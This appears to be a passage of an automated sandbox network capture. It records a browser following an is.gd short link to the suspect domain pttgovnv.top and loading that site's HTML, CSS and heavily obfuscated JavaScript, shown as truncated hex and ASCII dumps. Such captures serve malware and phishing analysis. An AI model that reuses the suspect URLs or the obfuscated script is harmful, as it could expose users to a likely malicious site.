    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Sep 2, 2024 00:28:17.770791054 CEST840INHTTP/1.1 301 Moved Permanently
    Date: Sun, 01 Sep 2024 22:28:17 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: keep-alive
    Cache-Control: max-age=3600
    Expires: Sun, 01 Sep 2024 23:28:17 GMT
    Location: https://pttgovnv.top/help
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFfJo08f8UfYvDbSlukjvUMg5UJk1jT3H7vdljgdT21F7G4uJ%2Bev7sU8B%2F6JjNi9rLVcEd9awuBVgJPtLdwLJlTGMYRHqXYfez4RTeQ0yxpySdB4%2B%2FAQ93XusSfNU7s%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Vary: Accept-Encoding
    Server: cloudflare
    CF-RAY: 8bc8b14abbc88c69-EWR
    alt-svc: h3=":443"; ma=86400
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
    Sep 2, 2024 00:29:02.780488968 CEST6OUTData Raw: 00
    Data Ascii:


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.449735172.67.83.132443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:16 UTC657OUTGET /pttgovnvv HTTP/1.1
    Host: is.gd
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:16 UTC534INHTTP/1.1 301 Moved Permanently
    Date: Sun, 01 Sep 2024 22:28:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Location: http://pttgovnv.top/help
    CF-Cache-Status: DYNAMIC
    Set-Cookie: __cf_bm=IjkEpDqNTaemW5EkS4C.6XY7V7e2mVkmNJVRJultNkQ-1725229696-1.0.1.1-4GzUALxBdsm4pM74EQBoAg688FR7mxit18dovKOjRU.5q93TLZna9k4OHCh.tDAP4P7hW18POt.atW17XzAHuw; path=/; expires=Sun, 01-Sep-24 22:58:16 GMT; domain=.is.gd; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 8bc8b1456d9f7d24-EWR
    2024-09-01 22:28:16 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    1192.168.2.449740104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:18 UTC659OUTGET /help HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:18 UTC655INHTTP/1.1 301 Moved Permanently
    Date: Sun, 01 Sep 2024 22:28:18 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Access-Control-Allow-Origin: *
    Location: /help/
    Vary: Accept
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jen1%2F7YzZC8N%2BOPCPARrQpC8eivm30KOgH32rOahkhAh%2BaeuJjTM%2FtM1lyeWMy94BPCAFygjt3ggolDqEjOEAxGJtk2NUfAHWSwT%2F0PeHGIZkUBmmixWg6%2FNdNhO2BY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b1506ede8c59-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:18 UTC74INData Raw: 34 34 0d 0a 3c 70 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 22 3e 2f 68 65 6c 70 2f 3c 2f 61 3e 3c 2f 70 3e 0d 0a
    Data Ascii: 44<p>Moved Permanently. Redirecting to <a href="/help/">/help/</a></p>
    2024-09-01 22:28:18 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    2192.168.2.449742104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:19 UTC660OUTGET /help/ HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:19 UTC709INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:19 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lA56FuQSKWm2qS4q86N%2BsXgdzGH6FkpVqU%2BsO0kHZ0uZ5xbnN02lCaFF9nnaNiqB%2Fx2lVfMuNHbGdtvfa4TXMSyEu7LRflDtEbGIx5X10nd5K5F9NicXr7MlqvTVnUo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b15609d1422f-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:19 UTC660INData Raw: 36 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 0a 20 20 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 0a 20 20 20 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 73 72 63 3d 22 2e 2f 61 73 73 65 74 73 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70
    Data Ascii: 666<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" /> <script type="module" crossorigin src="./assets/index-f5457718.js"></scrip
    2024-09-01 22:28:19 UTC985INData Raw: 20 62 65 20 69 67 6e 6f 72 65 64 22 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 76 69 74 65 2d 6c 65 67 61 63 79 2d 70 6f 6c 79 66 69 6c 6c 22 29 2c 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6e 2e 73 72 63 3d 65 2e 73 72 63 2c 6e 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 53 79 73 74 65 6d 2e 69 6d 70 6f 72 74 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 76 69 74 65 2d 6c 65 67 61 63 79 2d 65 6e 74 72 79 27 29 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 73 72 63 27 29 29 7d 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 7d 28 29 3b 3c 2f
    Data Ascii: be ignored");var e=document.getElementById("vite-legacy-polyfill"),n=document.createElement("script");n.src=e.src,n.onload=function(){System.import(document.getElementById('vite-legacy-entry').getAttribute('data-src'))},document.body.appendChild(n)}();</
    2024-09-01 22:28:19 UTC5INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    3192.168.2.449743184.28.90.27443
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:19 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Encoding: identity
    User-Agent: Microsoft BITS/7.8
    Host: fs.microsoft.com
    2024-09-01 22:28:20 UTC467INHTTP/1.1 200 OK
    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
    Content-Type: application/octet-stream
    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
    Server: ECAcc (lpl/EF70)
    X-CID: 11
    X-Ms-ApiVersion: Distribute 1.2
    X-Ms-Region: prod-neu-z1
    Cache-Control: public, max-age=152241
    Date: Sun, 01 Sep 2024 22:28:19 GMT
    Connection: close
    X-CID: 2


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.449745104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:20 UTC557OUTGET /help/assets/f6170fbbkFGym.css HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: text/css,*/*;q=0.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: style
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:20 UTC735INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:20 GMT
    Content-Type: text/css; charset=utf-8
    Content-Length: 952
    Connection: close
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:42 GMT
    ETag: W/"3b8-18fc3d84650"
    CF-Cache-Status: HIT
    Age: 37242
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FY4dLdMsMuK4FB1Cftg1KTnKZgeW9P1sLoTT1kl7khAJzconZi%2F6gGM000hbrTqLIh0TFFcOqohlpejoWwIUB31NO33xwd5IbNgvDWBsHSr0Xwv%2BQnbBofS8ddqv9SQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b15db835236b-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:20 UTC634INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 67 2d 6c 6f 61 64 69 6e 67 2d 62 67 41 6e 69 6d 7b 30 25 2c 74 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 36 33 35 29 7d 35 30 25 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 7d 7d 2e 67 2d 6c 6f 61 64 69 6e 67 2d 6d 61 73 6b 7b 77 69 64 74 68 3a 31 30 30 76 77 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 67 2d 6c 6f 61
    Data Ascii: @keyframes g-loading-bgAnim{0%,to{background-color:rgba(255,255,255,.635)}50%{background-color:rgba(255,255,255,0)}}.g-loading-mask{width:100vw;height:100vh;display:flex;justify-content:center;align-items:center;position:fixed;left:0;top:0;animation:g-loa
    2024-09-01 22:28:20 UTC318INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 64 61 74 61 2d 74 5d 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 64 61 74 61 2d 74 29 20 22 20 22 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 31 30 30 30 76 77 7d 5b 63 6c 61 73 73 5e 3d 5f 5d 5b 63 6c 61 73 73 24 3d 5f 5d 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e
    Data Ascii: !important}[data-t]:after{content:attr(data-t) " "}[class^=_][class$=_]{color:transparent!important}[class^=_][class$=_]{display:inline-block;pointer-events:none;position:absolute;left:1000vw}[class^=_][class$=_]::-moz-selection{color:transparent!importan


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    5192.168.2.449744104.21.47.250443928C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-09-01 22:28:20 UTC570OUTGET /help/assets/index-f5457718.js HTTP/1.1
    Host: pttgovnv.top
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    Origin: https://pttgovnv.top
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: */*
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: script
    Referer: https://pttgovnv.top/help/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-09-01 22:28:20 UTC761INHTTP/1.1 200 OK
    Date: Sun, 01 Sep 2024 22:28:20 GMT
    Content-Type: application/javascript; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Vary: Accept-Encoding
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=86400
    Last-Modified: Wed, 29 May 2024 10:14:46 GMT
    ETag: W/"7b2c9-18fc3d855f0"
    CF-Cache-Status: HIT
    Age: 43367
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56moAtvq4NTiqJkudibmnB5Ea2k6%2Bpo4qnpfI%2FClt7Nt4m8%2B2rU0HLxikmGdsWmo6carih9wzmFC9Qiqkv8eKaSA6%2BNXH3SbWcteUCOwTTDDznHM9K6MXEKvCpu6jKo%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8bc8b15daac66a5e-EWR
    alt-svc: h3=":443"; ma=86400
    2024-09-01 22:28:20 UTC608INData Raw: 37 63 62 36 0d 0a 76 61 72 20 61 33 38 5f 30 78 33 62 39 38 37 37 3d 61 33 38 5f 30 78 34 33 35 62 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 35 31 35 31 66 2c 5f 30 78 35 34 39 63 64 62 29 7b 76 61 72 20 5f 30 78 39 65 61 31 62 66 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 32 31 38 63 33 62 3d 5f 30 78 34 35 31 35 31 66 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 61 65 32 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 32 29 29 2f 30 78 31 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 33 62 62 29 29 2f 30 78 32 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31 62 66 28 30 78 34 63 38 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 39 65 61 31
    Data Ascii: 7cb6var a38_0x3b9877=a38_0x435b;(function(_0x45151f,_0x549cdb){var _0x9ea1bf=a38_0x435b,_0x218c3b=_0x45151f();while(!![]){try{var _0x53ae22=-parseInt(_0x9ea1bf(0x3b2))/0x1+parseInt(_0x9ea1bf(0x3bb))/0x2+-parseInt(_0x9ea1bf(0x4c8))/0x3*(-parseInt(_0x9ea1
    2024-09-01 22:28:20 UTC1369INData Raw: 5d 28 5f 30 78 32 31 38 63 33 62 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 33 38 5f 30 78 34 38 32 32 2c 30 78 65 37 30 66 36 29 29 3b 66 75 6e 63 74 69 6f 6e 20 50 78 28 29 7b 76 61 72 20 5f 30 78 31 66 62 35 61 63 3d 61 33 38 5f 30 78 34 33 35 62 3b 69 6d 70 6f 72 74 2e 6d 65 74 61 5b 5f 30 78 31 66 62 35 61 63 28 30 78 35 33 63 29 5d 2c 69 6d 70 6f 72 74 28 27 5f 27 29 5b 5f 30 78 31 66 62 35 61 63 28 30 78 36 33 39 29 5d 28 28 29 3d 3e 30 78 31 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 2a 5f 30 78 33 65 39 34 30 33 28 29 7b 7d 7d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 31 33 34 66 33 30 3d 61 33 38 5f 30 78 34 33 35 62 2c 5f 30 78 34 37 36 37 32 39 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 65 61
    Data Ascii: ](_0x218c3b['shift']());}}}(a38_0x4822,0xe70f6));function Px(){var _0x1fb5ac=a38_0x435b;import.meta[_0x1fb5ac(0x53c)],import('_')[_0x1fb5ac(0x639)](()=>0x1);async function*_0x3e9403(){}}(function(){var _0x134f30=a38_0x435b,_0x476729=(function(){var _0x4ea
    2024-09-01 22:28:20 UTC1369INData Raw: 5b 5f 30 78 33 37 37 34 62 38 28 30 78 34 37 39 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 26 26 28 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 33 37 32 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 3d 5f 30 78 34 66 64 66 37 34 5b 5f 30 78 33 37 37 34 62 38 28 30 78 31 61 36 29 2b 5f 30 78 33 37 37 34 62 38 28 30 78 36 64 61 29 5d 29 2c 5f 30 78 34 66 64 66 37 34 5b 27 63 72 6f 73 73 6f 72 69 67 69 27 2b 27 6e 27 5d 3d 3d 3d 5f 30 78 33 37 37 34 62 38 28 30 78 35 36 36 29 2b 27 74 69 61 6c 73 27 3f 5f 30 78 33 36 39 31 65 66 5b 5f 30 78 33 37 37 34 62 38 28 30 78 35 64 65 29 2b 27 73 27 5d 3d 5f 30 78 33 37 37 34 62 38 28
    Data Ascii: [_0x3774b8(0x479)]),_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]&&(_0x3691ef[_0x3774b8(0x372)+_0x3774b8(0x6da)]=_0x4fdf74[_0x3774b8(0x1a6)+_0x3774b8(0x6da)]),_0x4fdf74['crossorigi'+'n']===_0x3774b8(0x566)+'tials'?_0x3691ef[_0x3774b8(0x5de)+'s']=_0x3774b8(
    2024-09-01 22:28:20 UTC1369INData Raw: 30 35 34 35 36 5d 3d 21 30 78 30 3b 63 6f 6e 73 74 20 5f 30 78 34 63 36 30 62 36 3d 5f 30 78 32 30 35 34 35 36 5b 27 65 6e 64 73 57 69 74 68 27 5d 28 5f 30 78 35 34 39 31 30 39 28 30 78 32 65 31 29 29 2c 5f 30 78 35 30 32 64 39 38 3d 5f 30 78 34 63 36 30 62 36 3f 27 5b 72 65 6c 3d 5c 78 32 32 73 74 79 6c 27 2b 5f 30 78 35 34 39 31 30 39 28 30 78 33 39 35 29 3a 27 27 3b 69 66 28 21 21 5f 30 78 32 38 37 62 65 66 29 66 6f 72 28 6c 65 74 20 5f 30 78 33 34 33 38 31 34 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 35 34 39 31 30 39 28 30 78 33 63 36 29 5d 2d 30 78 31 3b 5f 30 78 33 34 33 38 31 34 3e 3d 30 78 30 3b 5f 30 78 33 34 33 38 31 34 2d 2d 29 7b 63 6f 6e 73 74 20 5f 30 78 32 63 39 66 64 33 3d 5f 30 78 35 31 37 36 37 64 5b 5f 30 78 33 34 33 38 31 34 5d 3b 69
    Data Ascii: 05456]=!0x0;const _0x4c60b6=_0x205456['endsWith'](_0x549109(0x2e1)),_0x502d98=_0x4c60b6?'[rel=\x22styl'+_0x549109(0x395):'';if(!!_0x287bef)for(let _0x343814=_0x51767d[_0x549109(0x3c6)]-0x1;_0x343814>=0x0;_0x343814--){const _0x2c9fd3=_0x51767d[_0x343814];i
    2024-09-01 22:28:20 UTC1369INData Raw: 5f 30 78 32 30 36 62 61 31 28 30 78 33 38 65 29 2b 27 5c 78 32 32 68 74 74 70 3a 2f 2f 77 77 27 2b 27 77 2e 77 33 2e 6f 72 67 2f 32 27 2b 27 30 30 30 2f 73 76 67 5c 78 32 32 5c 78 32 30 78 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 34 35 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 33 38 30 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 31 63 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 32 39 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 34 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 62 37 29 2b 27 30 30 5c 78 32 32 5c 78 32 30 70 72 65 73 65 72 27 2b 5f 30 78 32 30 36 62 61 31 28 30 78 32 62 66 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 35 37 64 29 2b 5f 30 78 32 30 36 62 61 31 28 30 78 31 39 33 29 2b 27 5c 78 32 30 3c 70 61 74 68 5c 78 32 30 66 69 6c 27
    Data Ascii: _0x206ba1(0x38e)+'\x22http://ww'+'w.w3.org/2'+'000/svg\x22\x20x'+_0x206ba1(0x459)+_0x206ba1(0x380)+_0x206ba1(0x11c)+_0x206ba1(0x229)+_0x206ba1(0x5b4)+_0x206ba1(0x5b7)+'00\x22\x20preser'+_0x206ba1(0x2bf)+_0x206ba1(0x57d)+_0x206ba1(0x193)+'\x20<path\x20fil'
    2024-09-01 22:28:20 UTC1369INData Raw: 74 79 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 36 36 33 29 2b 27 5c 78 32 32 5c 78 32 30 64 75 72 3d 5c 78 32 32 31 73 5c 78 32 32 27 2b 27 5c 78 32 30 62 65 67 69 6e 3d 5c 78 32 32 2d 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 66 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 35 37 29 2b 27 72 65 70 65 61 74 43 6f 75 6e 27 2b 27 74 3d 5c 78 32 32 69 6e 64 65 66 69 6e 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 65 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 38 34 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 38 33 29 2b 27 6d 3d 5c 78 32 32 72 6f 74 61 74 65 28 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78
    Data Ascii: ty\x22\x20values'+_0x1457f1(0x5be)+_0x1457f1(0x663)+'\x22\x20dur=\x221s\x22'+'\x20begin=\x22-0'+_0x1457f1(0x3ff)+_0x1457f1(0x457)+'repeatCoun'+'t=\x22indefin'+_0x1457f1(0x1f2)+_0x1457f1(0x3fe)+_0x1457f1(0x384)+_0x1457f1(0x183)+'m=\x22rotate('+_0x1457f1(0x
    2024-09-01 22:28:20 UTC1369INData Raw: 34 35 37 66 31 28 30 78 33 36 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 30 38 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 33 66 61 29 2b 27 69 67 68 74 3d 5c 78 32 32 31 32 5c 78 32 32 5c 78 32 30 27 2b 5f 30 78 31 34 35 37 66 31 28 30 78 31 35 37 29 29 2b 28 5f 30 78 66 33 32 30 35 30 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 78 30 3a 5f 30 78 66 33 32 30 35 30 5b 5f 30 78 31 34 35 37 66 31 28 30 78 34 61 65 29 2b 27 74 65 27 5d 28 5f 30 78 31 34 35 37 66 31 28 30 78 35 62 63 29 29 29 2b 28 5f 30 78 31 34 35 37 66 31 28 30 78 32 36 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 34 66 32 29 2b 5f 30 78 31 34 35 37 66 31 28 30 78 32 37 64 29 2b 27 61 6d 65 3d 5c 78 32 32 6f 70 61 63 69 27 2b 27 74 79 5c 78 32 32 5c 78 32 30 76 61 6c 75 65 73 